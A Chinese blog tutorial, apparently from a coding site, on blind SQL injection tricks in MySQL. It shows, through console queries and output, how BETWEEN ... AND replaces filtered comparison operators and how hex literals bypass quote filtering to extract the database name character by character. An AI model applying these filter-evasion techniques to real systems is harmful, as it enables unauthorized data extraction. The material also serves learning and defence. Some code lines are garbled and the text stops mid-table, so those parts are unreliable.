SQL注入的2个小Trick及示例总结

清水湾湾 發表於 2023-8-21 00:00:00

<p>
<span><strong>前言</strong></span></p>
<p>
最近发现了两个关于sql注入的小trick,分享一下.下面话不多说了，来一起看看详细的介绍吧</p>
<p>
<span><strong>between and 操作符代替比较符</strong></span></p>
<p>
操作符 BETWEEN … AND 会选取介于两个值之间的数据范围。这些值可以是数值、文本或者日期。</p>
<p>
between and有数据比较功能</p>
<blockquote>
<p>
exp1 between min and max</p>
<p>
如果exp1的结果处于min和max之间,`between and`就返回`1`,反之返回`0`.</p>
</blockquote>
<p>
<strong>示例</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_178891">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql color2">user</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | username | </code><code class="sql keyword">password</code> <code class="sql plain">| email |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 3 | admin | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">| 4 | </code><code class="sql keyword">add</code> <code class="sql plain">| 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql color2">user</code> <code class="sql keyword">where</code> <code class="sql plain">id </code><code class="sql color1">between</code> <code class="sql plain">1 </code><code class="sql color1">and</code> <code class="sql plain">2;</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">| id | username | </code><code class="sql keyword">password</code> <code class="sql plain">| email |</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |</code>
</div>
<div class="line number16 index15 alt1">
<code class="sql plain">+</code><code class="sql comments">----+----------+----------------------------------+-------------------+</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
大多数数据库都支持between and操作,但是对于边界的处理有所不同,在mysql中,between and 是包含边界的,在数学中也就是</p>
<p>
<span><strong>在盲注中应用</strong></span></p>
<p>
between and可以用来在过滤了=,like, regexp,>,<的情况下使用.</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_580951">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">();</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| test |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
1. 配合截取函数使用</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_401952">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">mid(</code><code class="sql keyword">database</code><code class="sql plain">(),1,1) </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'a'</code> <code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| mid(</code><code class="sql keyword">database</code><code class="sql plain">(),1,1) </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'a'</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">|   0 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">mid(</code><code class="sql keyword">database</code><code class="sql plain">(),1,1) </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'t'</code> <code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| mid(</code><code class="sql keyword">database</code><code class="sql plain">(),1,1) </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'t'</code> <code class="sql plain">|</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">|   1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">-----------------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>2. 截取函数被过滤</strong></p>
<p>
表达式</p>
<blockquote>
<p>
select exp between min and max</p>
</blockquote>
<p>
在截取字符函数被过滤的时候,设置min和 max的方式有所改变.</p>
<p>
测试1</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_48660">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'b'</code><code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'b'</code> <code class="sql plain">|</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'b'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code><code class="sql plain">;</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| </code><code class="sql string">'b'</code> <code class="sql color1">between</code> <code class="sql string">'b'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code> <code class="sql plain">|</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">-------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
测试2</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_844859">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'b'</code><code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'b'</code> <code class="sql plain">|</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| 0 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'b'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code><code class="sql plain">;</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| </code><code class="sql string">'bcd'</code> <code class="sql color1">between</code> <code class="sql string">'b'</code> <code class="sql color1">and</code> <code class="sql string">'c'</code> <code class="sql plain">|</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">---------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
由测试可知,当exp为单个字符时三种区间返回值都是1,但是当exp为字符串时,当区间为a-b时,返回值为0.区间为a-c或者b-c时,返回值为1.</p>
<p>
也就是在进行字符串比较时,只会包含一边的值,也就是[b,c).</p>
<p>
所以在实际利用时,就要注意区间的范围.</p>
<p>
实际测试</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_792347">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.05 sec)</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">...</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code> <code class="sql plain">|</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'u'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'u'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code> <code class="sql plain">|</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">| 0 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">--------------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
由结果可知,第一个字符为t</p>
<p>
第二个字符</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_308302">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'tatest</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql string">+----------------------------------+test</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">ta</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">' |test</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql string">|    1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql string">1 row in set (0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql string">mysql> select database() between '</code><code class="sql plain">te</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">';</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">te</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">' |</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql string">|    1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql string">1 row in set (0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql string">mysql> select database() between '</code><code class="sql plain">tf</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">';</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">tf</code><code class="sql string">' and '</code><code class="sql plain">tz' |</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">|    0 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
剩下的以此类推.最终为test.</p>
<p>
<strong>3. 单引号被过滤</strong></p>
<p>
between and还支持16进制,所以可以用16进制,来绕过单引号的过滤.</p>
<p>
测试</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_325194">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x61 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x61 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">|    1 |</code>
</div>
<div class="line number6 index5 alt1">
